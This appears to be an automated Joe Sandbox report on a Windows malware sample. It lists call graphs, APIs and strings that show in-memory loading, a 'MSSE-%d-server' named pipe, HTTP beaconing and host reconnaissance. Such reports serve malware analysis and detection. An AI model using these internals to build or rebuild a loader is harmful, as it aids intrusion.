401762 ReadFile 37375->37377 37376->37374 37377->37375 37377->37376 37379 4015c7 37378->37379 37380 4015e8 VirtualProtect CreateThread 37379->37380 37380->37372 37384 401630 CreateNamedPipeA 37381->37384 37385 4016dc 37384->37385 37386 40168f ConnectNamedPipe 37384->37386 37386->37385 37387 4016a3 37386->37387 37388 4016c6 CloseHandle 37387->37388 37389 4016a7 WriteFile 37387->37389 37388->37385 37389->37388 37390 4016d1 37389->37390 37390->37387 37391 681b48 37392 681b64 37391->37392 37394 681b69 37391->37394 37405 6892d0 GetSystemTimeAsFileTime GetCurrentThreadId QueryPerformanceCounter __security_init_cookie 37392->37405 37395 681bf4 37394->37395 37402 681bbe 37394->37402 37406 6819e8 118 API calls 15 library calls 37394->37406 37395->37402 37407 6793e0 37395->37407 37397 681c12 37399 681c3b 37397->37399 37401 6793e0 _DllMainCRTStartup 205 API calls 37397->37401 37399->37402 37423 6819e8 118 API calls 15 library calls 37399->37423 37403 681c2e 37401->37403 37422 6819e8 118 API calls 15 library calls 37403->37422 37405->37394 37406->37395 37408 6794bb 37407->37408 37411 679402 _DllMainCRTStartup 37407->37411 37491 67b47c 37408->37491 37410 679407 _DllMainCRTStartup 37410->37397 37411->37410 37421 679465 _DllMainCRTStartup 37411->37421 37508 67d4d8 GetCurrentProcess GetCurrentProcess _RTC_GetSrcLine _DllMainCRTStartup 37411->37508 37414 679448 37415 679457 37414->37415 37416 67949f 37414->37416 37414->37421 37415->37421 37509 67d2ec GetCurrentProcess VirtualFree _DllMainCRTStartup 37415->37509 37416->37421 37511 67d134 GetCurrentProcess GetCurrentProcess _DllMainCRTStartup 37416->37511 37419 679487 37419->37421 37510 67d2ec GetCurrentProcess VirtualFree _DllMainCRTStartup 37419->37510 37424 66ca74 37421->37424 37422->37399 37423->37402 37512 675fec 37424->37512 37426 66ca92 _DllMainCRTStartup 37519 67f284 37426->37519 37428 66cb40 _DllMainCRTStartup 37536 67c230 37428->37536 37434 66cbb5 37435 67eaa8 _DllMainCRTStartup 41 API calls 37434->37435 37436 66cbcf 37435->37436 37561 66f3c0 37436->37561 37439 66cbd8 37623 67da74 20 API calls 2 library calls 37439->37623 37441 66cbdd _DllMainCRTStartup 37442 66cbf4 37441->37442 37443 66cbf9 37441->37443 37624 67da74 20 API calls 2 library calls 37442->37624 37566 66f1f8 37443->37566 37447 66cc0e 37572 66f274 37447->37572 37448 66cc09 37625 67da74 20 API calls 2 library calls 37448->37625 37452 66cc17 37626 67da74 20 API calls 2 library calls 37452->37626 37454 66cc1c _DllMainCRTStartup 37455 67f284 malloc 38 API calls 37454->37455 37456 66cc4f 37455->37456 37457 66cc57 37456->37457 37458 66cc5c _DllMainCRTStartup 37456->37458 37627 67da74 20 API calls 2 library calls 37457->37627 37460 67eaa8 _DllMainCRTStartup 41 API calls 37458->37460 37461 66cc78 _DllMainCRTStartup 37460->37461 37584 675c60 GetACP 37461->37584 37492 675fec _DllMainCRTStartup 38 API calls 37491->37492 37493 67b4a0 _setmbcp_nolock _DllMainCRTStartup 37492->37493 37494 67f284 malloc 38 API calls 37493->37494 37495 67b52d _setmbcp_nolock 37494->37495 37496 67eaa8 _DllMainCRTStartup 41 API calls 37495->37496 37497 67b55e _DllMainCRTStartup 37496->37497 37499 67b575 _DllMainCRTStartup 37497->37499 37748 66f014 37497->37748 37500 67b611 GetComputerNameA 37499->37500 37503 67b634 __crtGetEnvironmentStringsW _DllMainCRTStartup 37499->37503 37752 67baa8 _DllMainCRTStartup 37500->37752 37505 67f284 malloc 38 API calls 37503->37505 37506 67b802 37503->37506 37507 67eaa8 _DllMainCRTStartup 41 API calls 37503->37507 37505->37503 37753 6760e0 8 API calls 2 library calls 37506->37753 37507->37503 37508->37414 37509->37419 37510->37421 37511->37421 37513 67f284 malloc 38 API calls 37512->37513 37514 67600d 37513->37514 37515 67f284 malloc 38 API calls 37514->37515 37518 676015 _setmbcp_nolock _DllMainCRTStartup 37514->37518 37516 676021 37515->37516 37516->37518 37628 67f244 8 API calls 2 library calls 37516->37628 37518->37426 37520 67f29c 37519->37520 37521 67f318 37519->37521 37523 67f2d4 HeapAlloc 37520->37523 37524 67f2b4 37520->37524 37529 67f2fd 37520->37529 37533 67f302 37520->37533 37632 681db4 DecodePointer 37520->37632 37635 681db4 DecodePointer 37521->37635 37523->37520 37528 67f30d 37523->37528 37524->37523 37629 681df0 34 API calls 2 library calls 37524->37629 37630 681e64 34 API calls 5 library calls 37524->37630 37631 67ff54 GetModuleHandleExW GetProcAddress ExitProcess __crtCorExitProcess 37524->37631 37525 67f31d 37636 681d18 8 API calls _getptd_noexit 37525->37636 37528->37428 37633 681d18 8 API calls _getptd_noexit 37529->37633 37634 681d18 8 API calls _getptd_noexit 37533->37634 37637 68145c GetSystemTimeAsFileTime 37536->37637 37541 67f284 malloc 38 API calls 37543 67c2a1 _setmbcp_nolock __crtGetEnvironmentStringsW 37541->37543 37544 67c30a 37543->37544 37642 68181c 37543->37642 37545 68181c strtok 47 API calls 37544->37545 37546 66cb87 37545->37546 37547 6734a0 37546->37547 37548 68145c _time64 GetSystemTimeAsFileTime 37547->37548 37549 6734b3 37548->37549 37550 68044c _DllMainCRTStartup 44 API calls 37549->37550 37551 6734bb _DllMainCRTStartup 37550->37551 37684 672f5c 37551->37684 37554 67eaa8 37555 67eae7 37554->37555 37560 67eafd _setmbcp_nolock 37554->37560 37556 67eaf3 37555->37556 37557 67eaff 37555->37557 37558 67f284 malloc 38 API calls 37556->37558 37689 681914 41 API calls 5 library calls 37557->37689 37558->37560 37560->37434 37562 66f3d4 _DllMainCRTStartup 37561->37562 37563 66cbd4 37562->37563 37564 66f3da GetLocalTime 37562->37564 37563->37439 37563->37441 37565 66f408 _DllMainCRTStartup 37564->37565 37565->37563 37568 66f20e _DllMainCRTStartup 37566->37568 37567 66cc05 37567->37447 37567->37448 37568->37567 37568->37568 37690 67a8dc 63 API calls _DllMainCRTStartup 37568->37690 37570 66f248 37691 67a914 62 API calls 3 library calls 37570->37691 37574 66f299 _DllMainCRTStartup 37572->37574 37573 66cc13 37573->37452 37573->37454 37574->37573 37575 66f2eb htonl htonl 37574->37575 37575->37573 37576 66f30b 37575->37576 37577 67f284 malloc 38 API calls 37576->37577 37578 66f315 __crtGetEnvironmentStringsW _DllMainCRTStartup 37577->37578 37579 66f36b _setmbcp_nolock 37578->37579 37692 67a8dc 63 API calls _DllMainCRTStartup 37578->37692 37694 67f244 8 API calls 2 library calls 37579->37694 37581 66f34c 37693 67a914 62 API calls 3 library calls 37581->37693 37585 675c88 getSystemCP 37584->37585 37695 661218 37585->37695 37589 675ca8 __security_init_cookie 37590 675cae GetTickCount 37589->37590 37591 68044c _DllMainCRTStartup 44 API calls 37590->37591 37592 675cbf 37591->37592 37701 66cfa4 CryptAcquireContextA CryptAcquireContextA CryptReleaseContext GetSystemTimeAsFileTime _DllMainCRTStartup 37592->37701 37594 675cc4 _DllMainCRTStartup 37595 675cfe 37594->37595 37596 675cec GetCurrentProcess 37594->37596 37702 67dec8 CheckTokenMembership FreeSid _DllMainCRTStartup 37595->37702 37738 670c64 GetModuleHandleA GetProcAddress 37596->37738 37598 675cfa 37598->37595 37600 675d06 37703 66e2a8 htonl htonl 37600->37703 37602 675d1c 37704 66e200 htonl __crtGetEnvironmentStringsW 37602->37704 37604 675d2f 37705 66e200 htonl __crtGetEnvironmentStringsW 37604->37705 37606 675d3f 37706 66e200 htonl __crtGetEnvironmentStringsW 37606->37706 37608 675d4f 37707 66e248 htonl htonl _DllMainCRTStartup 37608->37707 37610 675d5e __security_init_cookie 37708 66e248 htonl htonl _DllMainCRTStartup 37610->37708 37612 675d6f 37709 66e278 htonl _DllMainCRTStartup 37612->37709 37614 675d7a 37710 66e1e0 htonl _DllMainCRTStartup 37614->37710 37616 675d85 37711 675e28 37616->37711 37628->37518 37629->37524 37630->37524 37632->37520 37633->37533 37634->37528 37635->37525 37636->37528 37638 67c259 37637->37638 37639 68044c 37638->37639 37651 685844 37639->37651 37643 685844 _getptd 44 API calls 37642->37643 37644 681840 37643->37644 37645 68190e 37644->37645 37648 681861 37644->37648 37681 688c50 RtlCaptureContext RtlLookupFunctionEntry UnhandledExceptionFilter IsProcessorFeaturePresent __report_securityfailure 37645->37681 37647 681913 37672 687e20 37648->37672 37656 685868 GetLastError 37651->37656 37653 68584f 37654 67c261 37653->37654 37668 6800b4 44 API calls 3 library calls 37653->37668 37654->37541 37669 6840a8 37656->37669 37658 685885 37659 6858d2 _getptd_noexit 37658->37659 37660 684728 _calloc_crt 6 API calls 37658->37660 37659->37653 37661 68589a 37660->37661 37661->37659 37662 6840c4 _freeptd TlsSetValue 37661->37662 37663 6858b0 37662->37663 37664 6858cd 37663->37664 37665 6858b7 _initptd 37663->37665 37666 67f244 free 6 API calls 37664->37666 37667 6858be GetCurrentThreadId 37665->37667 37666->37659 37667->37659 37670 6840b8 37669->37670 37671 6840bb TlsGetValue 37669->37671 37670->37671 37673 687e29 37672->37673 37674 681903 37673->37674 37675 688b7c IsProcessorFeaturePresent 37673->37675 37674->37543 37676 688b93 37675->37676 37682 683ffc RtlCaptureContext RtlLookupFunctionEntry __crtCaptureCurrentContext 37676->37682 37678 688ba6 37683 688b30 UnhandledExceptionFilter __crtUnhandledException _call_reportfault failwithmessage 37678->37683 37681->37647 37682->37678 37685 66cb94 37684->37685 37687 672f87 _DllMainCRTStartup 37684->37687 37685->37554 37686 67f284 malloc 38 API calls 37686->37687 37687->37685 37687->37686 37688 67eaa8 _DllMainCRTStartup 41 API calls 37687->37688 37688->37687 37689->37560 37690->37570 37691->37567 37692->37581 37693->37579 37694->37573 37741 661184 CryptAcquireContextA 37695->37741 37698 661245 37700 67b0b4 38 API calls _DllMainCRTStartup 37698->37700 37700->37589 37701->37594 37702->37600 37703->37602 37704->37604 37705->37606 37706->37608 37707->37610 37708->37612 37709->37614 37710->37616 37712 675fec _DllMainCRTStartup 38 API calls 37711->37712 37713 675e51 _DllMainCRTStartup 37712->37713 37714 675eb5 GetComputerNameA 37713->37714 37747 66f008 37714->37747 37738->37598 37742 6611c2 CryptAcquireContextA 37741->37742 37745 6611e6 _DllMainCRTStartup 37741->37745 37743 66120c 37742->37743 37742->37745 37743->37698 37746 6610d0 GetSystemTimeAsFileTime clock 37743->37746 37744 6611fd CryptReleaseContext 37744->37743 37745->37744 37746->37698 37749 66f02f _DllMainCRTStartup 37748->37749 37750 66f058 WSAIoctl 37749->37750 37751 66f051 _DllMainCRTStartup 37749->37751 37750->37751 37751->37499 37752->37503 37754 689cec 37755 689d01 37754->37755 37761 689d1e 37754->37761 37756 689d0f 37755->37756 37755->37761 37762 681d18 8 API calls _getptd_noexit 37756->37762 37758 689d36 HeapAlloc 37759 689d14 37758->37759 37758->37761 37761->37758 37761->37759 37763 681db4 DecodePointer 37761->37763 37762->37759 37763->37761 37764 1b88d4 37765 1b8961 37764->37765 37770 1b9324 37765->37770 37767 1b8a01 37774 1b96b4 37767->37774 37769 1b8a8f 37773 1b935e 37770->37773 37771 1b9479 37771->37767 37772 1b9455 VirtualAlloc 37772->37771 37773->37771 37773->37772 37777 1b9723 37774->37777 37775 1b994f 37775->37769 37776 1b976e LoadLibraryA 37776->37777 37777->37775 37777->37776

                Executed Functions

                Function 00401180 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 196sleepstringCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 10 401180-4011ae 11 401460-401463 GetStartupInfoA 10->11 12 4011b4-4011d1 10->12 14 401470-40148a call 402e88 11->14 13 4011e9-4011f4 12->13 15 4011f6-401204 13->15 16 4011d8-4011db 13->16 20 401417-401426 call 402e90 15->20 21 40120a-40120e 15->21 18 401400-401411 16->18 19 4011e1-4011e6 Sleep 16->19 18->20 18->21 19->13 28 401229-40122b 20->28 29 40142c-401447 _initterm 20->29 24 401490-4014a9 call 402e80 21->24 25 401214-401223 21->25 36 4014ae-4014b6 call 402e60 24->36 25->28 25->29 31 401231-40123e 28->31 32 40144d-401452 28->32 29->31 29->32 33 401240-401248 31->33 34 40124c-401299 call 401fd0 SetUnhandledExceptionFilter call 4024e0 call 402ef0 call 401d40 call 402f00 31->34 32->31 33->34 48 4012b2-4012b8 34->48 49 40129b 34->49 50 4012a0-4012a2 48->50 51 4012ba-4012c8 48->51 52 4012f0-4012f6 49->52 56 4012a4-4012a7 50->56 57 4012e9 50->57 53 4012ae 51->53 54 4012f8-401302 52->54 55 40130e-401333 malloc 52->55 53->48 60 4013f0-4013f5 54->60 61 401308 54->61 62 401335-40133a 55->62 63 40137b-4013af call 401950 call 403040 55->63 58 4012d0-4012d2 56->58 59 4012a9 56->59 57->52 58->57 65 4012d4 58->65 59->53 60->61 61->55 66 401340-401374 strlen malloc memcpy 62->66 72 4013b4-4013c2 63->72 68 4012d8-4012e2 65->68 66->66 69 401376 66->69 68->57 71 4012e4-4012e7 68->71 69->63 71->57 71->68 72->36 73 4013c8-4013d0 72->73 73->14 74 4013d6-4013e5 73->74
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
                • String ID: 0PE$@6E$DCE
                • API String ID: 649803965-2430247936
                • Opcode ID: 51392e7461e9e07ed7f19d0721189c0bf25b9227d41394980ff0e93a3bc1fca1
                • Instruction ID: 7b6093c48930a8ef89593839c944e9f908a2e32032a5f35aeb8b435f34b377a6
                • Opcode Fuzzy Hash: 51392e7461e9e07ed7f19d0721189c0bf25b9227d41394980ff0e93a3bc1fca1
                • Instruction Fuzzy Hash: 5C71ADB5601B0486EB259F56E89476A33A1B745BCAF84803BEF49673E6DF7CC844C348
                Function 0066E68C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 165networkfileCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                APIs
                • _snprintf.LIBCMT ref: 0066E725
                  • Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
                  • Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E
                  • Part of subcall function 00677B38: _snprintf.LIBCMT ref: 00677CA5
                • _snprintf.LIBCMT ref: 0066E7BD
                • _snprintf.LIBCMT ref: 0066E7D4
                • HttpOpenRequestA.WININET ref: 0066E818
                • HttpSendRequestA.WININET ref: 0066E84A
                • InternetQueryDataAvailable.WININET ref: 0066E87A
                • InternetCloseHandle.WININET ref: 0066E898
                  • Part of subcall function 00672D70: strchr.LIBCMT ref: 00672DD6
                  • Part of subcall function 00672D70: _snprintf.LIBCMT ref: 00672E0C
                  • Part of subcall function 00672C0C: strchr.LIBCMT ref: 00672C69
                  • Part of subcall function 00672C0C: _snprintf.LIBCMT ref: 00672CB3
                • InternetReadFile.WININET ref: 0066E8D4
                • InternetCloseHandle.WININET ref: 0066E8F5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _snprintf$Internet$CloseHandleHttpRequeststrchr$AvailableDataFileOpenQueryReadSend_errno_invalid_parameter_noinfo
                • String ID: %s%s$*/*
                • API String ID: 3536628738-856325523
                • Opcode ID: 5c4b2c5719e067ce629add7012f112fb417b911470ce534f4123a2ba84123eb0
                • Instruction ID: d172ce45b955779f0415644ddcf92c05ff9dd92b9507bddcc31c82f88435206d
                • Opcode Fuzzy Hash: 5c4b2c5719e067ce629add7012f112fb417b911470ce534f4123a2ba84123eb0
                • Instruction Fuzzy Hash: 7B61D236700B8186EB50DF65E4507AEB7A7F785B98F40412AEE4D57B58DF39C50AC700
                Function 00675E28 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 116stringCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: Name$ComputerFileModuleUserVersion_snprintfmallocstrrchr
                • String ID: %s%s%s
                • API String ID: 1671524875-1891519693
                • Opcode ID: 40ae984fd8d1d60e03acc18bee9c81741f4638c9dfd0547d5b2d8a001e524837
                • Instruction ID: c28a7dd79399c0947703d9ca336236560d4538fccad7daf3844f32ce664af0b6
                • Opcode Fuzzy Hash: 40ae984fd8d1d60e03acc18bee9c81741f4638c9dfd0547d5b2d8a001e524837
                • Instruction Fuzzy Hash: 2241D23470468146EA44FB22E92472E779BBB85FD0F848129FE5A0BF55CF3DC1528748
                Function 00661184 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39encryptionCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 182 661184-6611c0 CryptAcquireContextA 183 6611e6-6611f9 call 692020 182->183 184 6611c2-6611e4 CryptAcquireContextA 182->184 188 6611fd-66120a CryptReleaseContext 183->188 189 6611fb 183->189 184->183 185 66120c-661216 184->185 188->185 189->188
                APIs
                • CryptAcquireContextA.ADVAPI32 ref: 006611B8
                • CryptAcquireContextA.ADVAPI32 ref: 006611DC
                • CryptGenRandom.ADVAPI32 ref: 006611F0
                • CryptReleaseContext.ADVAPI32 ref: 00661204
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: Crypt$Context$Acquire$RandomRelease
                • String ID: ($Microsoft Base Cryptographic Provider v1.0
                • API String ID: 685801729-4046902070
                • Opcode ID: 0f7b575704e2efa4e71594adee21552c9336b074ba1ad3f512173577c0e57d68
                • Instruction ID: f528ba85227e950b9a5ff7247e49097112dbfb7c3d4fe532c91b4787bb7a5fda
                • Opcode Fuzzy Hash: 0f7b575704e2efa4e71594adee21552c9336b074ba1ad3f512173577c0e57d68
                • Instruction Fuzzy Hash: D901D83570074182E710CF65E898359B767F7D8F88F488025D74987B24CF79C699C740
                Function 00401630 Relevance: 6.0, APIs: 4, Instructions: 50pipefileCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 399 401630-40168d CreateNamedPipeA 400 4016dc-4016e5 399->400 401 40168f-4016a1 ConnectNamedPipe 399->401 401->400 402 4016a3-4016a5 401->402 403 4016c6-4016cf CloseHandle 402->403 404 4016a7-4016c4 WriteFile 402->404 403->400 404->403 405 4016d1-4016da 404->405 405->402
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: NamedPipe$CloseConnectCreateFileHandleWrite
                • String ID:
                • API String ID: 2239253087-0
                • Opcode ID: a137092020d99df8e6f9d9be70b23b42cb61a637a040608a59e494d996c8cf1e
                • Instruction ID: 33ab9d0585ac1679f1025b945fed68b18b66da774309cd2c41c4043231b0423c
                • Opcode Fuzzy Hash: a137092020d99df8e6f9d9be70b23b42cb61a637a040608a59e494d996c8cf1e
                • Instruction Fuzzy Hash: 431182A1714A5047E7208B12EC4870AB660B785BEAF548635EE5D1BBE4DB7DC445CB08
                Function 004017F8 Relevance: 22.8, APIs: 4, Strings: 9, Instructions: 54threadCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                • malloc.MSVCRT ref: 004017B9
                • SleepEx.KERNELBASE ref: 004017CD
                  • Part of subcall function 00401704: CreateFileA.KERNEL32 ref: 0040174D
                  • Part of subcall function 00401704: ReadFile.KERNEL32 ref: 00401777
                  • Part of subcall function 00401704: CloseHandle.KERNEL32 ref: 00401784
                • GetTickCount.KERNEL32 ref: 004017FC
                • CreateThread.KERNEL32 ref: 00401885
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: CreateFile$CloseCountHandleReadSleepThreadTickmalloc
                • String ID: @@$%c%c%c%c%c%c%c%c%cMSSE-%d-server$.$\$\$e$i$p$p
                • API String ID: 3660650057-1020837823
                • Opcode ID: 66b9071a1fbc2149318147bf2399a6e6d29a638d527e23c28c2dfbdbcde83963
                • Instruction ID: b345380edbdca45ebb9784712c11a19872ab0759f856dd5cf37371eb7f92d9a3
                • Opcode Fuzzy Hash: 66b9071a1fbc2149318147bf2399a6e6d29a638d527e23c28c2dfbdbcde83963
                • Instruction Fuzzy Hash: 6A11DFB2214A80C7E714CF62FC4575ABBA0F3C478AF44412AEB091B7A8CB7CC545CB08
                Function 0066EA48 Relevance: 9.1, APIs: 6, Instructions: 109networkCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                APIs
                  • Part of subcall function 0067E0FC: RevertToSelf.ADVAPI32 ref: 0067E10A
                • InternetOpenA.WININET ref: 0066EB0C
                • InternetSetOptionA.WININET ref: 0066EB2C
                • InternetSetOptionA.WININET ref: 0066EB44
                • InternetConnectA.WININET ref: 0066EB7A
                • InternetSetOptionA.WININET ref: 0066EBB7
                • InternetSetOptionA.WININET ref: 0066EBE2
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: Internet$Option$ConnectOpenRevertSelf
                • String ID:
                • API String ID: 1513466045-0
                • Opcode ID: a9b8b553a89bf16a576f3c9bc92d43a984d256c5d92c920833b48d6b9218c37a
                • Instruction ID: a3c04ec4af3ea140744b9b6893a1626f6dc64dd5709c99981c3f251268a58bfe
                • Opcode Fuzzy Hash: a9b8b553a89bf16a576f3c9bc92d43a984d256c5d92c920833b48d6b9218c37a
                • Instruction Fuzzy Hash: BD412935300B8182EB54EF51F4A57A977A3F789B88F148019DA4A17B1ADF3EC426CB04
                Function 0066CA74 Relevance: 7.8, APIs: 6, Instructions: 296COMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 228 66ca74-66cbd6 call 675fec call 6761e8 * 3 call 67b454 call 67b464 * 2 call 67b434 * 2 call 67b454 * 2 call 67f284 call 67b434 * 3 call 67b464 call 67c230 call 6734a0 call 67eaa8 * 2 call 66f3c0 271 66cbdd-66cbf2 call 67b434 call 66f1e4 228->271 272 66cbd8 call 67da74 228->272 278 66cbf4 call 67da74 271->278 279 66cbf9-66cc07 call 66f1f8 271->279 272->271 278->279 283 66cc0e-66cc15 call 66f274 279->283 284 66cc09 call 67da74 279->284 288 66cc17 call 67da74 283->288 289 66cc1c-66cc55 call 67b464 call 67b434 call 67f284 283->289 284->283 288->289 297 66cc57 call 67da74 289->297 298 66cc5c-66cc90 call 67b434 call 67eaa8 call 67b434 call 675c60 289->298 297->298 308 66cc96-66cc9d 298->308 309 66cebb-66cee7 call 67c218 call 67f244 call 67da74 298->309 310 66cca2-66cd24 call 67bfc0 call 67f63c call 67bfc0 call 67f63c * 2 call 672ee0 308->310 329 66cd26-66cd2a 310->329 330 66cd44-66cd77 call 66ea48 call 67b434 call 66e9f4 310->330 331 66cd2e-66cd35 329->331 341 66cd9c-66cd9f 330->341 342 66cd79-66cd87 call 67ad44 330->342 331->331 333 66cd37-66cd3a 331->333 333->330 335 66cd3c-66cd3f call 6731f4 333->335 335->330 343 66ce26 341->343 344 66cda5-66cdc8 call 676b98 call 67b434 341->344 351 66cd95-66cd98 342->351 352 66cd89-66cd93 call 678e0c 342->352 347 66ce2c-66ce38 call 66e9c8 call 66f3c0 343->347 360 66cdcf-66cdf0 call 6718c4 call 675144 call 674a04 call 66f3c0 344->360 361 66cdca 344->361 362 66ce3f-66ce5d call 67bf04 347->362 363 66ce3a call 67da74 347->363 351->341 352->341 388 66cdf2-66cdf5 call 66f484 360->388 389 66cdfa-66ce01 360->389 361->360 370 66ce64-66ce6c 362->370 371 66ce5f call 67da74 362->371 363->362 370->309 374 66ce6e-66ce76 370->374 371->370 376 66cea4 call 67211c 374->376 377 66ce78-66ce89 374->377 385 66cea9-66ceb5 376->385 381 66ce9c 377->381 382 66ce8b-66ce9a call 66f3a0 377->382 383 66ce9e-66cea0 381->383 382->383 383->376 387 66cea2 383->387 385->309 385->310 387->376 388->389 389->347 392 66ce03-66ce24 call 66e9c8 call 66ea48 call 66ec04 389->392 392->347
                APIs
                  • Part of subcall function 00675FEC: malloc.LIBCMT ref: 00676008
                • malloc.LIBCMT ref: 0066CB3B
                  • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                  • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                  • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                  • Part of subcall function 0067C230: _time64.LIBCMT ref: 0067C254
                  • Part of subcall function 0067C230: malloc.LIBCMT ref: 0067C29C
                  • Part of subcall function 0067C230: strtok.LIBCMT ref: 0067C300
                  • Part of subcall function 0067C230: strtok.LIBCMT ref: 0067C311
                  • Part of subcall function 006734A0: _time64.LIBCMT ref: 006734AE
                  • Part of subcall function 0067EAA8: malloc.LIBCMT ref: 0067EAF8
                  • Part of subcall function 0067EAA8: realloc.LIBCMT ref: 0067EB07
                  • Part of subcall function 0066F3C0: GetLocalTime.KERNEL32 ref: 0066F3DF
                • malloc.LIBCMT ref: 0066CC4A
                • _snprintf.LIBCMT ref: 0066CCC1
                • _snprintf.LIBCMT ref: 0066CCE7
                • free.LIBCMT ref: 0066CEC6
                  • Part of subcall function 0067AD44: malloc.LIBCMT ref: 0067AD78
                  • Part of subcall function 0067AD44: free.LIBCMT ref: 0067AF2F
                  • Part of subcall function 00678E0C: htonl.WS2_32 ref: 00678E3D
                  • Part of subcall function 00678E0C: htonl.WS2_32 ref: 00678E4A
                • _snprintf.LIBCMT ref: 0066CD0E
                  • Part of subcall function 0067DA74: Sleep.KERNEL32 ref: 0067DABC
                  • Part of subcall function 0067DA74: ExitThread.KERNEL32 ref: 0067DAC6
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: malloc$_snprintf$_errno_time64freehtonlstrtok$AllocExitHeapLocalSleepThreadTime_callnewhrealloc
                • String ID:
                • API String ID: 548016584-0
                • Opcode ID: 2bc6c26e52030706472ef6675f80d589c4fc0031a0de3ea0680d9c9adc863854
                • Instruction ID: 16eebcad59399b91420e8f2b6aaa84d72e3de6bc391615428ee9825792860063
